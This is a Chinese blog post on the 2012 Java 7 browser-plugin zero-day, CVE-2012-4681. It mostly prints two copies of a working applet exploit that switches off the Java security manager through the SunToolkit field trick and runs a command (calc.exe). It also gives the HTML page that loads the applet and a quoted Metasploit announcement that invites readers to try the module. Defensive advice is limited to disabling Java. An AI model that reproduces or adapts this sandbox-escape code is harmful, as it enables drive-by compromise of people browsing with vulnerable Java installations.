java新0day

jre 远程代码执行

产生:

FireEeye在8月27日发布了一个新的java 0day的一些相关信息,该漏洞影响浏览器的JRE[1.7.x]插件,影响非常大,攻击者可利用该漏洞进行挂马攻击,进而控制网民用户的计算机。在捕获的样本中发现使用了Dadong’s JSXX 0.44 VIP加密方式。目前,该漏洞的利用代码已被公开,而官方尚未发布任何补丁;在补丁发布之前,建议用户卸载或禁用JRE(如果安装了JRE)。

报告地址:http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html

影响:

此漏洞影响JRE[1.7.x]插件,不影响java 6及以下

受影响浏览器:

包括IE、Firefox、opera、chrome

补丁状态:

目前尚未补丁!

相关代码:

我测试的Java源码

  1. package test0day;  
  2.   
  3. import java.applet.Applet;  
  4. import java.awt.Graphics;  
  5. import java.beans.Expression;  
  6. import java.beans.Statement;  
  7. import java.lang.reflect.Field;  
  8. import java.net.URL;  
  9. import java.security.AccessControlContext;  
  10. import java.security.AllPermission;  
  11. import java.security.CodeSource;  
  12. import java.security.Permissions;  
  13. import java.security.ProtectionDomain;  
  14. import java.security.cert.Certificate;  
  15.   
  16. public class Gondvv20120828_1 extends Applet {  
  17.   
  18.     public Gondvv20120828_1() {  
  19.   
  20.     }  
  21.     public void disableSecurity() throws Throwable {  
  22.         Statement localStatement = new Statement(System.class,  
  23.                 "setSecurityManager"new Object[1]);  
  24.         Permissions localPermissions = new Permissions();  
  25.         localPermissions.add(new AllPermission());  
  26.         ProtectionDomain localProtectionDomain = new ProtectionDomain(  
  27.                 new CodeSource(new URL("file:///"), new Certificate[0]),  
  28.                 localPermissions);  
  29.         AccessControlContext localAccessControlContext = new AccessControlContext(  
  30.                 new ProtectionDomain[] { localProtectionDomain });  
  31.         SetField(Statement.class"acc", localStatement,  
  32.                 localAccessControlContext);  
  33.         localStatement.execute();  
  34.     }  
  35.   
  36.     private Class GetClass(String paramString) throws Throwable {  
  37.         Object arrayOfObject[] = new Object[1];  
  38.         arrayOfObject[0] = paramString;  
  39.         Expression localExpression = new Expression(Class.class"forName",  
  40.                 arrayOfObject);  
  41.         localExpression.execute();  
  42.         return (Class) localExpression.getValue();  
  43.     }  
  44.   
  45.     private void SetField(Class paramClass, String paramString,  
  46.             Object paramObject1, Object paramObject2) throws Throwable {  
  47.         Object arrayOfObject[] = new Object[2];  
  48.         arrayOfObject[0] = paramClass;  
  49.         arrayOfObject[1] = paramString;  
  50.         Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);  
  51.         localExpression.execute();  
  52.         ((Field) localExpression.getValue()).set(paramObject1, paramObject2);  
  53.     }  
  54.   
  55.     public void init() {  
  56.         try {  
  57.             disableSecurity();  
  58.             Process localProcess = null;  
  59.             localProcess = Runtime.getRuntime().exec("calc.exe");  
  60.             if (localProcess != null)  
  61.                 ;  
  62.             localProcess.waitFor();  
  63.         } catch (Throwable localThrowable) {  
  64.             localThrowable.printStackTrace();  
  65.         }  
  66.     }  
  67.   
  68.     public void paint(Graphics paramGraphics) {  
  69.         paramGraphics.drawString("Loading"5025);  
  70.     }  
  71. }  

网页源码:

  1. <html>  
  2.  <body bgcolor="#0F0F0F">  
  3.   <applet code="./test0day/Gondvv20120828_1.class" width="300" height="200" alt="抱歉,您的浏览器不支持Java applet" align="center" vspace="20"></applet>  
  4.  </body>  
  5. </html>  

网络中java源码:

  1. //  
  2. // CVE-2012-XXXX Java 0day  
  3. //  
  4. // reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html  
  5. //   
  6. // secret host / ip : ok.aa24.net / 59.120.154.62  
  7. //  
  8. // regurgitated by jduck  
  9. //  
  10. // probably a metasploit module soon...  
  11. //  
  12. package cve2012xxxx;  
  13.   
  14. import java.applet.Applet;  
  15. import java.awt.Graphics;  
  16. import java.beans.Expression;  
  17. import java.beans.Statement;  
  18. import java.lang.reflect.Field;  
  19. import java.net.URL;  
  20. import java.security.*;  
  21. import java.security.cert.Certificate;  
  22.   
  23. public class Gondvv extends Applet  
  24. {  
  25.   
  26.     public Gondvv()  
  27.     {  
  28.     }  
  29.   
  30.     public void disableSecurity()  
  31.         throws Throwable  
  32.     {  
  33.         Statement localStatement = new Statement(System.class"setSecurityManager"new Object[1]);  
  34.         Permissions localPermissions = new Permissions();  
  35.         localPermissions.add(new AllPermission());  
  36.         ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);  
  37.         AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {  
  38.             localProtectionDomain  
  39.         });  
  40.         SetField(Statement.class"acc", localStatement, localAccessControlContext);  
  41.         localStatement.execute();  
  42.     }  
  43.   
  44.     private Class GetClass(String paramString)  
  45.         throws Throwable  
  46.     {  
  47.         Object arrayOfObject[] = new Object[1];  
  48.         arrayOfObject[0] = paramString;  
  49.         Expression localExpression = new Expression(Class.class"forName", arrayOfObject);  
  50.         localExpression.execute();  
  51.         return (Class)localExpression.getValue();  
  52.     }  
  53.   
  54.     private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)  
  55.         throws Throwable  
  56.     {  
  57.         Object arrayOfObject[] = new Object[2];  
  58.         arrayOfObject[0] = paramClass;  
  59.         arrayOfObject[1] = paramString;  
  60.         Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);  
  61.         localExpression.execute();  
  62.         ((Field)localExpression.getValue()).set(paramObject1, paramObject2);  
  63.     }  
  64.   
  65.     public void init()  
  66.     {  
  67.         try  
  68.         {  
  69.             disableSecurity();  
  70.             Process localProcess = null;  
  71.             localProcess = Runtime.getRuntime().exec("calc.exe");  
  72.             if(localProcess != null);  
  73.                localProcess.waitFor();  
  74.         }  
  75.         catch(Throwable localThrowable)  
  76.         {  
  77.             localThrowable.printStackTrace();  
  78.         }  
  79.     }  
  80.   
  81.     public void paint(Graphics paramGraphics)  
  82.     {  
  83.         paramGraphics.drawString("Loading"5025);  
  84.     }  
  85. }  


测试结果:


解决方案:

见链接:http://www.java.com/zh_CN/download/help/enable_browser.xml

以下来源:https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day

The above example is a successful attack against a fully patched Windows 7 SP1 with Java 7 Update 6.  We have also tested the module against the following environments:

  • Mozilla Firefox on Ubuntu Linux 10.04
  • Internet Explorer / Mozilla Firefox / Chrome on Windows XP
  • Internet Explorer / Mozilla Firefox on Windows Vista
  • Internet Explorer / Mozilla Firefox on Windows 7
  • Safari on OS X 10.7.4

 

As a user, you should take this problem seriously, because there is currently no patch from Oracle.  For now, our recommendation is to completely disable Java until a fix is available.

 

To try out this exploit: Get your free Metasploit download now, or update your existing installation.  Meanwhile, we will keep this blog updated when more progress has been made.

 

Aug 28 2012: This vulnerability has been assigned as CVE-2012-4681.

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值